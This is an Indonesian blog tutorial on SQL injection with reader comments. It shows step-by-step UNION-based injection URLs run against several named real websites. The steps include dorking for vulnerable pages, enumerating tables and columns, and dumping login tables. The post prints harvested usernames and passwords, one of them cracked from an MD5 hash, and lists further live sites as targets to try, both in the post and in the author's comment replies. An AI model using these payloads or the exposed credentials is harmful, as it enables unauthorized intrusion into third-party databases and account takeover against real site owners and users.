Sebelum Makan siang : SQL Injection?

Beranda > Tutorial > Sebelum Makan siang : SQL Injection?

Sebelum Makan siang : SQL Injection?

Juni 24, 2010 rahmatvinacerpus Tinggalkan komentar Go to comments

Sahabat muda ;pencinta computer kali ini saya akan sedikit membahas sql ijection , tidak hanya sebuah trick atau sekedar Ibarat tapi langsung say kasih contoh common … Bro!

Pertama-tama anda searching di om google kayak gini:

Inurl:”.php?id=”

Muncul beberapa link langsung aja buka satu satu kali ini saya akan meng injeksi salah satu web di web itu juga ada forumnya ini alamatnya:

http://www.footballderbies.com/fans/index.php?id=33

terus kita coba ada bugsnya gak kasih tanda kutip dibelakang angaka 33

jadi :

http://www.footballderbies.com/fans/index.php?id=33’

oke !, setelah dikasih tanda kutip web berubah sebagian isinya hilang, perlu anda ketahui ada sebagian web langsung mengularkan pesan error , jadi intinya sama aja.

Next sekarang kita coba tambah kan perintah

http://www.footballderbies.com/fans/index.php?id=33+ORDER+BY+100–

perintah ini untuk mengecek jumlah field di database dengan group yang sejenis saya kasih angka 100, karena saya yakin tidak field yang lebih dari seratus!, nah kalau dikasih angka 100 tidak mau masih eror maka turunin angkanya.

Ujicoba di web ini seperti berikut ini:

http://www.footballderbies.com/fans/index.php?id=33+order+by+6–

nah diatas 6 masih juga muncul error , artinya field tidak lebih dari 6 field , Oke next kita inject d engan perintah union , yang fungsinya untuk melihat table lain yang dengan table tertentu kira2 seperti itu yang pernah say abaca kalau salah maaf Ya..

http://www.footballderbies.com/fans/index.php?id=-33+UNION+SELECT+1,2,3,4,5,6–

coba lihat dibagian header muncul angka 6 , lewat angka 6 inilah kita akan memasukan perintah Version(), user(), pertama kita chek apakah php ini versi 5 keatas atau 4 , kalau versi 4 maka lebih baik cari web yang lain he…he..

http://www.footballderbies.com/fans/index.php?id=-33+UNION+SELECT+1,2,3,4,5,version()–

wowww… muncul tuch versi phpnya

versi : 5.0.27

next chek usernya:

http://www.footballderbies.com/fans/index.php?id=-33+UNION+SELECT+1,2,3,4,5,user()–

User db: footballderbies@localhost

Asyik semakin nyata kalau web ini bisa di inject dengan sql Oke kita teruskan jalan-jalanya, sekarang kita lihat ada berapa table yang ada didatabase :

http://www.footballderbies.com/fans/index.php?id=-33+UNION+SELECT+1,2,3,4,5,group_concat(table_name)+FROM+information_schema.tables+where+table_schema=database()–

ha….ha…. banyak ya…. Tapi ambil aja table dengan nama : login_users,

kita coba cari tahu kolom apa aja yang ada di table login_user; ini perintahnya

http://www.footballderbies.com/fans/index.php?id=-33+UNION+SELECT+1,2,3,4,5,group_concat(column_name)+

FROM+information_schema.columns+where+table_name=0x6C6F67696E5F7573657273–

lihat link diatas pada bagian ujung ada seperi bilangan heksa mungkin ada yang Tanya dari mana angka itu?, Yups angka itu dihasilkan dari conver table login_user ke Heksa, jadi table yang akan kita cari tahu nama kolomnya mula-mula di ubah ke heksa , jangan pusing gimana cara ngubahnya ini dia Linkny:

http://www.pl4y31286.0fees.net/tools/text/

Oke kita lanjut kelangkah selanjutnya nah saat nya kita mengambil nilai ditiap kolomnya seprti

id,username,password, full_control

yang kita dapat dari table login_user coba kita masukan dikolom group_concat nya jadi seperti ini:

http://www.footballderbies.com/fans/index.php?id=-33+UNION+SELECT+1,2,3,4,5,group_concat(id,’User ‘,username,’paswd ‘,password,’Hak_akses’,full_control)+FROM+login_users–

Yups ..link diatas sedikit saya modifikasi , dengan manambahkan string User, paswd dan hak akses yang diapit kutip satu dan tujuan nya biar bacanya enggak ribet ada pemisah. Ha… ha…

Kalau udah monggo di ente apa yang terjaldi?, muncul lah apa yang kita mau.. !

Dan lihat field kolom 1 dengan akses control 1, wah ini pasti sang admin yang males.. he,,,,he… seperti brikut ini:

No userna

No	Username	Password	Hak akses
1	jordy	Kudel1	1

Lihat passwordnya sama sekali tidak di encrypt ….!, oke nah tugas anda sekarang cari halaman loginya terus login dech,

Kenapa saya menyuruh karena saya tidak metemu halaman loginnya he… he…. , ketumunya halaman login forumnya , langkahnya hamper sama kita conver t nama table phpbb_users , caranya sama kayak diatas sampe anda dapatkan user di forum itu, ?

Oke saya angap anda sudah pada bisa contoh saya akan masuk dengan salah satu user yang saya dapatkan:

No_field	Status Ol	username	Password
21	1	Nobelhopper	20cf6628597a66ecc9de05d875dc87bb

Masalahnya Tuch password nya di encrypt dengan Md5, kenapa saya tahu yup emang standar yang dipake seperti itu, silahkan decrypt passwordnya tinggal searching di google , tapi bagi anda yang males nih link untuk mendecrypt Md5:

http://www.md5decrypter.co.uk/

nah dari hasil decrypt saya dapatkan dengan User login sbb:

Username: Nobelhopper

Password: 210597ge

Oke sobat itulah sekilas sql injection , dan jika sobat mau nyoba silahkan uji wb ini:

Tapi saya mohon jangan di acak2nya ya, karena tutorial ini saya buat hanya sekedar pengetahuan agar kita lebih hati2 dan waspada terhadap segala kemungkinan: ini linknya:

http://www.itmaasia.com/news.php?id=1

Selamat Mencoba ya bro!

ini link yang pernah saya ujicoba jika belum di patch:

1. http://www.lpp.ac.id/politeknik.php?id=-30+UNION+SELECT+1,2,3,4,5,group_concat(user_id,user_name,user_pass),7,8,9,10,11,12,13+FROM+cni_user

2. http://www.itmaasia.com/news.php?id=-1+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27–

Like this:

Be the first to like this post.

Categories: Tutorial

Komentar (7) Lacak Balik (0) Tinggalkan komentar Lacak balik

rudex

Juni 24, 2010 pukul 12:29 pm | #1

Balas | Kutip

Wah nice banget nih bro infonya…

Ok ane coba..
EngCus

Juni 28, 2010 pukul 4:57 pm | #2

Balas | Kutip

mas rahmat yang paling gokiel…..gw newbie nih mau nanya..kalo misalnya setelah dikasih tanda petik tidak muncul pesan error..berarti gak bisa ya mas
Mas ini kalo bikin tutorial yang lengkap donggg..
jangan bikin orang tersesat….
Rahmatullah

Juni 28, 2010 pukul 6:13 pm | #3

Balas | Kutip

to Engcus:

Oh ya gak mesti error, bisa kayak gini:
http://www.organicindonesia.org/03stani-artikel.php?id=53‘

dan ini hasilnya:
http://www.organicindonesia.org/03stani-artikel.php?id=-53+UNION+SELECT+1,2,3,group_concat(0x3aa,username,0x3aa,password),5,6,7,8,9+from+tb_user–
Rahmatullah

Juni 28, 2010 pukul 6:46 pm | #4

Balas | Kutip

neh kalau jenis yang error:
http://solusisuamiistri.com/artikel.php?id=1121%27

dan ini akhirnya:
http://solusisuamiistri.com/artikel.php?id=-1121+UNION+SELECT+1,2,3,4,5,6,group_concat(username,0x3aa,password,nama,0x3aa),8,9,10,11,12,13+FROM+daftaranggota–
wiki

Juli 14, 2010 pukul 10:45 am | #5

Balas | Kutip

mas bisa buat absensi pegawai berbasis php dan database nya menggunakan Mysql…
cz sya daoat tugas kntor niii…
klo ad…
q tlong buat in sriptnya aj….
kirim via e-mail aj ya….
di wiki.mafia@gmail.com
tak tunggu…
seblmnya mksiH…

jombi_par

Agustus 19, 2010 pukul 7:41 pm | #6

Balas | Kutip

bisa aja sich ,cuma authentifikasinya pake apa?, misalnya waktu-basensi, tanggal absensi, kemudian dari IP berapa yang bisa akses Komputer aplikasi webnya.
intinya 1).gimana siuser hanya bisa melakukan absen satu kali saja dalam satu hari.
2) Siuser yang melakukan absensi atau dilakukan oleh pihak Administrator 3).atau dengan finger print, (untuk finger print mungkin perlu sofware tambahan.

* untuk korelasi(crm) databasesnya, relatif sederhana, tabel user, tabel rekap, tebel absen, tinggal tentukan primary yang akan dipakai Uniq fieldnya.thanks.

ucup

Agustus 11, 2010 pukul 9:55 am | #7

Balas | Kutip

kang tau namanya table login_user dari mana kang

Belum ada trackback.

Tinggalkan Balasan Cancel reply

Enter your comment here...

Fill in your details below or click an icon to log in:

Email (wajib) (Address never made public)

Nama (wajib)

Situs web

You are commenting using your WordPress.com account. ( Log Out / Ubah )

You are commenting using your Twitter account. ( Log Out / Ubah )

You are commenting using your Facebook account. ( Log Out / Ubah )

Batal

Connecting to %s

Belajar explode di Php Update Antivirus (Free Edition) di LAN secara otomatis tanpa koneksi ke internet

Pengumuman

Bagi Anda yang ingin Aplikasi Online tes Untuk sekolah dengan basis webase silahkan hubungi pak Adhi wirawan
Urgent Maaf Bagi yang ingin meminta source kode /software Aplikasi absensi tidak bisa saya penuhi secepatrnya maklum datanya terlalu besar jadi sulit kalau saya kirim via email mungkinnanti saya uplojad di source forge aja
Silahkan hubungi saya!
Menrima pembuatan web sesuai kebutuhan anda harga tergantung tingkat kesulitan .
phone: 021-32066189
untuk lihat silahkan klik di pustaka.awardspace.info
Thanks semuanya!

Bacaan Dunia IT

Installasi Windows XP
Installasi Windows XP Oleh Wahyu Andi Saputro pada 20 Maret 2010 A. Pendahuluan a. Konfigurasi Sistem Komputer Microsoft Windows XP Professional membutuhkan sumber-sumber daya yang relatif besar dibandingkan dengan Windows 9x dan Windows NT yang mendahuluinya. Konfigurasi sistem komputer yang dibutuhkan untuk proses instalasi adalah sebagai berikut : Kompone […]
Membuat Router Dengan Ubuntu 10.10
Sebelum memaparkan langkah – langkah saya dalam membuat router menggunakan Ubuntu Server, ada baiknya kalau kita mengetahui terlebih dahulu istilah dari router itu sendiri. Menurut Tante WIKI, router adalah sebuah alat jaringan komputer yang mengirimkan paket data melalui sebuah jaringan atau Internet menuju tujuannya, melalui sebuah proses yang dikenal seba […]
Membuat Server Sederhana Dengan Debian
Membuat Server Sederhana Dengan Debian Oleh: www.WahyuAndiSaputro.co.cc Landasan Teori Debian adalah sistem operasi bebas yang dikembangkan secara terbuka oleh banyak programer sukarela(pengembang Debian) yang tergabung dalam Proyek Debian. Sistem operasi Debian adalah gabungan dari perangkat lunak yang dikembangkan dengan lisensi GNU, dan utamanya menggunak […]
Sukses Ujian Nasional Praktik Kejuruan Teknik Komputer & Jaringan 2011/2012
BIOGRAFI PENULIS Wahyu Andi Saputro, Lahir di Sukoharjo, 27 April 1994. Yang sampai sekarang masih duduk di bangku sekolah kelas XII SMK Muhammadiyah 1 Sukoharjo Jurusan Teknik Komputer & Jaringan. Saat ini sedang sibuk menghadapi Ujian Nasional. Dengan kesibukan saya sebagai seorang pelajar dan bisnis yang saya jalankan. Aku sempatkan membuat Tutorial i […]
Membuat Router Sederhana Dengan Debian
Produksi Animasi 3D
Setelah sebelumnya saya membahas tentang PRA PRODUKSI, kini saatnya saya meneruskan tulisan saya tentang PRODUKSI. Produksi adalah proses membuat setelah semua yang akan dibuat selesai dikerjakan saat PRA PRODUKSI. Ada pernyataan bahwa dalam dunia animasi, creator adalah Tuhan untuk dunia tersebut. Oleh karena itu ada banyak yang perlu dibuat (jadi Tuhan itu […]

Adhi wirawan

Coda: Renungan di lembar terakhir sebuah biografi
Akhirnya selesai juga membaca biografi Steve Jobs nya Walter Isaacson. Selama membaca lembar demi lembar buku ini, saya merasa seperti membaca sebuah novel yang ditulis oleh seorang pengarang yang sangat brilian. Dan yang membuat saya takjub adalah keseluruhan ceritanya adalah real. Benar-benar dialami oleh seseorang. Secara garis besar buku tersebut menceri […]
Waduh….., kok pengunjung blog ini menurun drastis
Entah kenapa sejak 5 november 2011 (lima hari sebelum tulisan ini dimuat) kunjungan blog ini menurun drastis. dari rata-rata 300 pengunjung / per hari, sekarang tercatat hanya sekitar 40 saja. Emang sih saya uadah sangat jarang posting. Tapi sepertinya ini semacam anomali, barangkali ada alasan yang membuat mesin pencari tidak ramah lagi pada blog saya [...]
Lembar Jawaban Online
Selama ini guru pengguna onlinetest terbiasa menuliskan butir soal beserta kuncinya di komputer. Perlu waktu menginput butir-demi butir soal yang nantinya akan dikerjakan oleh siswa. Terpikir juga untuk menyediakan fitur Lembar Jawaban Online. Jadi disini guru hanya memasukkan kunci jawaban untuk setiap nomor soal (konsekuensinya penyajian soal tidak boleh a […]

Bisnis On-line

Panduan WordPress.com resmi (edisi English)
Setelah sekian lama, wordpress.com akhirnya mengeluarkan panduan wordpress.com resmi. Alamatnya ada di learn.wordpress.com. Berdasarkan informasi yang ada di halaman ini, learn.wordpress.com diperuntukkan untuk orang-orang sebagai berikut: * Wants to create a blog but isn’t quite sure where to start * Needs help choosing a blog topic * Wants to better unders […]
Membuat Form Kontak yang Fleksibel
Baru-baru ini, ada fitur baru dari wordpress.com yang diberi nama custom contact form. Postingan kali ini bisa dibilang lanjutan dari postingan tentang form kontak sebelumnya. Jika contact form edisi lama dibuat dengan cara mengetikkan kode [ contact-form ] (hilangkan tanda spasi yang ada di kode tersebut) di kotak posting artikel/halaman pada modus html; ma […]
Forum WordPress.Com Indonesia
Semakin hari, semakin banyak orang ngeblog. Bermunculan blogger-blogger baru. Sementara di sisi lain, blogger tuwir mulai berguguran karena serangan jejaring sosial dan berbagai macam alasan. Semakin hari pula, banyak tutorial mengenai cara ngeblog, cara ini, cara itu dan seterrusnya. Sebagian tutorial tersebut ada yang up to date, sebagian sudah basi. Ya, b […]
Susahnya Mengelola Penulis WordPress
Berawal dari keinginan untuk memasyarakatkan wordpress di Indonesia saya mulai membuat blog yang berisi panduan belajar wordpress di cafeblogger.web.id. Tapi seiring waktu, karena dari evaluasi saya memberi panduan dalam bentuk blog membutuhkan banyak waktu dan tenaga, maka kemudian saya mengemasnya dalam bentuk ebook dan dijual di cafebisnis.com. Sekarang c […]